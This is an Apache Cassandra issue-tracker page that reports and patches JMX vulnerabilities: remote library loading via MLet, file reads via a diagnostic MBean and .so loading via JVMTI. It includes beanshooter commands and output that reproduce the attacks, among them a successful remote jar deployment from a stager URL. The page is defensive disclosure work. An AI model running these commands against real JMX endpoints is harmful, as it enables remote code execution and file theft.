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  1. Cassandra
  2. CASSANDRA-17921

Harden JMX by resolving beanshooter issues




      Fix JMX security vulnerabilities

      As reported by Murray McAllister, there are multiple JMX vulnerabilities
      in the default Cassandra configuration on 3.0, 3.11, 4.0 and trunk,
      across Java 8 and Java 11. These are limited to authenticated JMX users

      1. (Java 8 and 11) Remote Java Library loading and execution via MLet
      2. (Java 11 only) Remote Java file reads via DiagnosticCommandMBean's
      compilerDirectivesAdd implementation leaking arbitrary file contents
      3. (Java 11 only) Remote .so library loading via JVMTI

      qtc-de/beanshooter is a JMX enumeration tool that uses these mechanisms
      and others:

      Remote file reads via compilerDirectiveAdd does not appear to be
      reproducible on Java 8 (cassandra-


      , Java 1.8.0_345-b01 from
      Adoptium / Temurin). Using qtc-de/beanshooter and cassandra-3.0

      $ java -jar target/beanshooter-3.0.0-jar-with-dependencies.jar diagnostic read --verbose 7199 /tmp/hello
      [-] A method with signature compilerDirectivesAdd([Ljava.lang.String;) does not exist on the endpoint.
      [-] If you invoked a deployed MBean, make sure that the correct version was deployed.
      [-] Cannot continue from here.

      Java 8 also appears to not be vulnerable to remote library loading:

      $ java -jar target/beanshooter-3.0.0-jar-with-dependencies.jar diagnostic load --verbose 7199 /tmp/hello
      [-] A method with signature jvmtiAgentLoad([Ljava.lang.String;) does not exist on the endpoint.
      [-] If you invoked a deployed MBean, make sure that the correct version was deployed.
      [-] Cannot continue from here.

      But Java 8 does appear to be vulnerable to MLet:

      $ java -jar target/beanshooter-3.0.0-jar-with-dependencies.jar tonka deploy --stager-url http://localhost:8000 7199
      [+] Starting MBean deployment.
      [+]     Deplyoing MBean: TonkaBean
      [+]             MBean class is not known by the server.
      [+]             Starting MBean deployment.
      [+]                     Deplyoing MBean: MLet
      [+]                     MBean with object name DefaultDomain:type=MLet was successfully deployed.
      [+]             Loading MBean from http://localhost:8000
      [+]                     Creating HTTP server on: localhost:8000
      [+]                     Creating MLetHandler for endpoint: /
      [+]                     Creating JarHandler for endpoint: /fb0f34fe7c4f456bb44c07d9650dbf1e
      [+]                     Starting HTTP server.
      [+]                     Incoming request from: localhost
      [+]                     Requested resource: /
      [+]                     Sending mlet:
      [+]                             Class:     de.qtc.beanshooter.tonkabean.TonkaBean
      [+]                             Archive:   fb0f34fe7c4f456bb44c07d9650dbf1e
      [+]                             Object:    MLetTonkaBean:name=TonkaBean,id=1
      [+]                             Codebase:  http://localhost:8000
      [+]                     Incoming request from: localhost
      [+]                     Requested resource: /fb0f34fe7c4f456bb44c07d9650dbf1e
      [+]                     Sending jar file with md5sum: 39d35ebd20aee73fbb83928584a530d7
      [+]     MBean with object name MLetTonkaBean:name=TonkaBean,id=1 was successfully deployed.

      Java 11 appears to be vulnerable to all three vulnerabilities, using JDK
      Adoptium / Temurin and cassandra-4.0 (5beab63b).

      This patch fixes the above issues by introducing a new system property:
      `cassandra.jmx.security.profile`, which can be set to "restrictive"
      (default) or "lax". The restrictive profile blocks the mechanisms for
      all three vulnerabilities, by introducing a JMX
      MBeanServerAccessController. Users can use the lax profile if they
      require these mechanisms, or use their own authorization proxy by
      specifying `cassandra.jmx.authorizer`.




            aratnofsky Abe Ratnofsky
            mck Michael Semb Wever
            Abe Ratnofsky
            Jon Meredith, Michael Semb Wever, Sam Tunnicliffe
            0 Vote for this issue
            2 Start watching this issue

